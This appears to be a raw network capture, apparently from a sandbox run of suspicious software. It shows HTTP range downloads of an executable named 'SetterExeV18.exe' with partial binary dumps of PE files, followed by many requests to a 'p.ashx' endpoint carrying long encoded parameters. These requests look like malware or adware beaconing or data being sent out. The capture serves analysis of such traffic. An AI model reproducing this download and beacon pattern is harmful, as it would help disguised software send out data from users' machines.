Accept-Ranges: bytes
Server: AmazonS3
Age: 64835
X-Cache: Hit from cloudfront
Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: FsDAYkxk2XssNWIwo0JzA2LXQpVjlT2zjtCWJVvPC-tU_XcSyLk26w==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......gu..#...#...
#.......!...........#...........I......."......."......."...Rich#.....
......................PE..L...9.dT...........!................P.......
.................................`....................................
..............................................tn..@...................
................................8............................text...O.
.......................... ..`.rdata...t..........................@..@
.data...x.... ....... ..............@....rsrc.........................
......@..@.reloc..............................@..B....................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>
GET /SetterExeV18.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d11sfnc01fj8ag.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT
Accept-Ranges: bytes
ETag: "a670962874c9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:55 GMT
Content-Range: bytes 0-249999/520704
X-Cache: Miss from cloudfront
Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Id: MJpICvSj2Cydx-1WUjll0t1VA0m2Ma9kx_kASN-RYyDUhX-SsbfcrA==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......]O..........
......*......|2......|..K....|.......V~.............dW..-....|6.......
z.....dW3.....Rich....................PE..L......U....................
......................@..........................@............@.......
...........................>..................................tY...
...................................@..................................
..........text...E........................... ..`.rdata...............
...............@..@.data....[...`...6...F..............@....rsrc......
..........|..............@..@.reloc..tY.......Z..................@..B.
......................................................................
......................................................................
......................................................................
......................................................................
...............................................h`.E..uW..Y.V...F.V.^..
.YPV..wG... ..hk.E..PW..Y^.V...F.V.8...YPV..vG... ..hz.E..*W..Y^.V...F
.V.....YPV..vG..\ ..h..E...W..Y^.V...F.V.....YPV..vG..6 ..h..E...V..Y^
.V...F.V.....YPV..vG... ..h..E...V..Y^.V...F.V.....YPV..vG......h..E..
.V..Y^.V...F.V.z...YPV.PvG......h..E..lV..Y^.h..F....G......h..E..PV..
Y.h..F....G......h..E..5V..Y.V.(.F.V.....YPV.hvG..h...h..E...V..Y^.V.8
.F.V.....YPV..vG..B...h..E...U..Y^.h&.E...U..Y.h..E...U..Y.h..E...U..Y
.h@.E...U..Y.V...F.V.....YPV..wG......hK.E...U..Y^.V...F.V.|...YPV
<<< skipped >>>
GET /SetterExeV18.exe HTTP/1.1
Range: bytes=500000-520703
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d11sfnc01fj8ag.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 20704
Connection: keep-alive
Cache-Control: private
Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT
Accept-Ranges: bytes
ETag: "a670962874c9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
Content-Range: bytes 500000-520703/520704
X-Cache: Miss from cloudfront
Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 3GTcsb7j63vuDDgY2d3TJxFAlC8gP__tZGa3NEqL3Ij31jqEzaeSAA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 20704..Connection: keep-alive..Cache-Control: private.
.Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT..Accept-Ranges: bytes..E
Tag: "a670962874c9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP
.NET..Date: Mon, 20 Mar 2017 00:19:56 GMT..Content-Range: bytes 500000
-520703/520704..X-Cache: Miss from cloudfront..Via: 1.1 27b3a801292660
302bc6c8d6a96c71ce.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 3GTcsb7j6
3vuDDgY2d3TJxFAlC8gP__tZGa3NEqL3Ij31jqEzaeSAA==......`...1090.0.1y1.1.
1.1.1.1.2R2.5.5j6p6.6.6.7.7.7.8.8.9.9.:.:2:.:.:.;.;.<.<.<f>
;.>.>.>V?y?.?.?......d...O0.0.0.1.1S1.2.2.2.2.2.3.3.4.4.4.6.6
.7 7.7.7.7!8|8.9.989D9.92:.:.:.:.;.;.;0<?<[<j<.= =.=s>}
>....(...!101>1.1.1.5.5.5N9]9k9.9.9R=a=o=.........0.1.1.2;2H2\2.
2.4P4v4.4.5i6.6.6.6.6.6.7.7 7W7d7x7.7.7.7.7.7.848L8R8.8.8.8.8.959.9.9.
: :l:.:.:.:.;X;.;.;.;I<.<.<.<.=.=.=.=.=.>;>P>h>
;y>.>. .......010.0.0.0.1W1\1t1.1.1.1.1.222N2S2_2d2|2.2.2.2.2.2.
2.3*3:3P3x3.3.3.3.3.3.3.3.4.4!4-424>4C4O4T4r4.4.4n5.6.6.6.6'777.9.9
.9.9P:Y:b:q:.:a<.<.<.=.=.>.>...0.......1)1c1|1.1.1.2.2a
2.2.2.2.2'3^3.3.304j4.4.4.4.5.5.5a6.6.7.7*787.9.9.9n:~:.:.:.:.:.:.:.;T
;.;.<%<9<M<a<u<.<.<.<.<.<.<.=.=)==
=Q=e=.=.>o>.?|?.?.?.?.?.?.?.?...@.......0%0-040<0D0j0}0.0.0.0
.0.0.0.0.0.1.1u1.2.2.2.2.2)2o2.2.2.2.2.2.3.3!3*323:3}3.3.3.3.3.3.4.4.4
D5T5.5.5.5.5.5.5.5.5.5,6E6V6.6.6.667G7.7.8X8`8u8.8.8.8.9j9.9.9.9.9
<<< skipped >>>
GET /SetterExeV18.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d11sfnc01fj8ag.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT
Accept-Ranges: bytes
ETag: "a670962874c9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:55 GMT
Content-Range: bytes 250000-499999/520704
X-Cache: Miss from cloudfront
Via: 1.1 0f0009772734d6975e26e0a8bc4716ea.cloudfront.net (CloudFront)
X-Amz-Cf-Id: nVRXnqt6YpKbRAvPpj1frNP0pGRh4MSG72XC7nZe3sGBVCslJyaepA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: private
..Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT..Accept-Ranges: bytes..
ETag: "a670962874c9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS
P.NET..Date: Mon, 20 Mar 2017 00:19:55 GMT..Content-Range: bytes 25000
0-499999/520704..X-Cache: Miss from cloudfront..Via: 1.1 0f0009772734d
6975e26e0a8bc4716ea.cloudfront.net (CloudFront)..X-Amz-Cf-Id: nVRXnqt6
YpKbRAvPpj1frNP0pGRh4MSG72XC7nZe3sGBVCslJyaepA==........Y.e...=..G....
......<.G......E..8.G..}.........5..G..5T.E......]...tt.5..G......]
..}..}.....}.;.rWj...P.E.9.t.;.rG.7....j...P.E......5..G..5T.E....E..5
..G....M.9M.u.9E.t..M....]..E.....h..E.h..E......YYh..E.h..E......YY.E
...... ....}..u)....G.....j..'...Y.u..\....}..t.j......Y.......U..j.j.
.u.........].U...}..u.............t......]..u.j..5h.G.....E.].........
.h`.C.d.5.....D$..l$..l$. .SVW.@gG.1E.3.P.e..u..E..E......E..E.d......
.M.d......Y__^[..]Q........U.....S.].VW.E...{..s.3=@gG..E..........t..
O...3.0.c....G..O...3.0.S....E..@.f.......E..E..E..E..C..C..E.........
...@.@..L........E...t{..........M.....~...~h.E..8csm.u(.=..E..t.h..E.
.t........t.j..u.....E.....U..M.......E..U.9P.t.h@gG.V........E..X....
..tu.f.M..]........^.....tG.!.E........{..t6h@gG.V.................t..
O...3.0.K....W..O...3.2.;....E._^[..]..O...3.0.$....G..O...3.0......M.
...I..&......U....(....@gG.3..E..}..Wt..u...i..Y.............jLj.P.@..
..................0.............................................f.
<<< skipped >>>
GET /p.ashx?e=obiBp3WOda8YEV9pcuJwXtjCW9 eJMmAWub0ofDzkCEegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPkCN9h bV19VAhTD7v1xeC4pGvADS7bOhhWoLVpCM9iEhqt6HrlyoIuXkcHJamqYAkU5MDCXDxgXn558pQYeTa 1l 1OLNhgAaPzXL8pY6Nn8Drm/gTHnKRatpWcD7V21UixaxLjlbxVMF4Batz9n/4= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:55 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WDJQ_AmQCj3DOUvDNet276USb0n9R5Syp64R51jcdIB_hNelRlGALw==
....
GET /p.ashx?e=aQQpsP6/AW3U0UsIWSR1jVRnyF84anr3YDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB49De26f9ELU77BAEjXP3GmOBvq/txek z3knywc6xSb HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: I3wvhbsz-MuIPBOjIs_Buwbt20jDNtFQUhamXcycquB_sVRdm2wvCw==
....
GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTA30wp9ZePTAnJscN vLrCowpfd9Pvun2DZj3l0wecJba60LKguj6icg== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tpVNEEjPUKsR3xznGiKszFZH6K4UPVtvA5w5sq1NJ5ZqXWFHL7V4kg==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRlFU7gimmHq/JscN vLrCo14/JpwhTbJacCuTErr5qdU= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: N1k_BQdXgQSTh0-hwGBPdcvAa3SBdpFDQ3fU5nVaf4kKvysGzYRyyQ==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRDvO0EiF3oHTyyO6Ebs4xmkKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFf5JnRTepcv7VTVcd9MOBGUtwntjomLvg8OihZvFiIAIMn/yeJ21ljtcBdNV8N7h HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vj8wThi7a3s8evEhdgzuBZarQwn1qv6TW_2iC4uU7g1LavBzFHaLVQ==
....
GET /p.ashx?e=xY8ohDYpM gO8fn3umFd V2PNcPuKknMw/KXmUS MBMPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrl JfVwpv1Wva0hvOLfOrKD/wvFkFqnHHo4G r 3F6T7MDuG8rKmKv5M2lG/K85LIzCdXy2lTPRW3vJOpxfY9B1A6K4wtfvcx1y2OGa7t1CL4lfxm/XoqxEdjLvQZAWuHXAH fOgpHnMH6wMvCefXXf GeemgIzPxkm30CyQo1Eg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: C8rVeNrqvcLXnIosG24Fli_NXSvxLH2j51CFR7tAe8VeLJ5lTxwLZw==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:56 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401
5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: C8rVeNrqvcLXnIosG24Fli_NX
SvxLH2j51CFR7tAe8VeLJ5lTxwLZw==..
....
GET /p.ashx?e=XJYuqQQo69dBmScQe cMuF2PNcPuKknMCkdmPrP3LyEPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrp7TtIX8b4qVoW979 PTPR/sLIuaJBIVfI4G r 3F6T7f9F3I6C91SWT/e9lpr/riA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KxTigRIEcxwbVd0v8l-Jwo1o5sj4ldFuNx8wfL38g27Bqi9y48bnpA==
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hbaBd5qR8ufkww3xXMGSlPc= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DKpiBbkiJrOz9FrXnZ89Ew1a4WB6hOyBGJjbT-U2db6JIslC6aDWuA==
....
GET /p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hYcizBU3y3xpkudLwF4whtg= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:57 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Og9L2kgUApwlrapQyHHerAfAMVdGprj0D5LF_xjtzjfOJNMnlr7p3Q==
....
GET /p.ashx?e=WL9usJOVMsOQs n7i1BIkNjCW9 eJMmApZtSBouT4jcegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPlLthe3E5HJFfRWApYRElbXqR4rzu9tChTEzQGoF c24CSOMVPCH eA= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: b9uR23ouXqBWjc9tDJU8OTmNowr0EMn16S7liZmnoeQeS72XVRw_VQ==
....
GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pMiQNTh4u5dqPxEMNdFi25Gw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: I2yw_weYa1bF4D36PoW1hN9W5PQOFh6-BUBVOz50hFEzo5ycZ2t6OQ==
....
GET /p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hYcizBU3y3xpkudLwF4whtg= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:58 GMT
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: UF5lcNfBdJgA2UzQBxPBz2aP2HuF_tBQN193VZwLiY3Off-O-5QicA==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:19:58 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 15191055e43ba835d0fead01ae8401
5c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: UF5lcNfBdJgA2UzQBxPBz2aP2
HuF_tBQN193VZwLiY3Off-O-5QicA==..
GET /p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTAqiKuwJ2QNWAL/XWHChDxEUKABP6K/iqqggPnHli0tZCBSCbmHG3q6QlEj4/HBfPTcUDrej7Uo8w= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6JHsJJEIQeYo0-U4dqKv6CYhch8_WMhUszeoGYkXgpLzvmwM9QdOtA==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRLWT0ooBBF1fVw12R6ofm/Y8iQvDAJnGKH8qnmCyK7v7JBTPp2F5gxC Mhrkq09y/amn0hKiMbceR3MOwIZ76JwmTqIjEwZJX8qZPamPhh78rf8SKYsXwuBxaqSxr2X7ENAlt3MuTiXc= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: BlAOFcxwbOiXn9xTHFZ1UzETNCtZcA3a9c34Qmz6j7wUpVvdqQUGeg==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopR5YFWQUANi8 KgQWEQh9QronZvqoB 8mW4yIycFcn/ g= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HbrK3FyvFAcYm46fOi9tRs90Cqn9Eg9S-wuHmAEBaGAYkUkTGH1ZNw==
....
GET /p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRvcTB46xWnxTTJVfgp7thqbPiCC4paVhd HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:19:56 GMT
X-Cache: Miss from cloudfront
Via: 1.1 3ccfbae98f5816b531634c1e82e45259.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gFG1ay4GmQ0_IlYntzciED7awRAsPn-4_J9A49SOEymDwjnkPpy1oA==
....
GET /p.ashx?e=xY8ohDYpM iNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquIApimWCrqakE8SFHLIEPsGc6 n uqijtZ6R90h7cidQhE1rXBz99ttxfA3C6KKE5uvEmaSYLmhGU1IGevJVygthPlRO7ICGTcD5MbnMHcJ64LtTjETGDUCjBYGPK7rWfXeCi/0KZZptbQRhqH8Cssw== HTTP/1.1
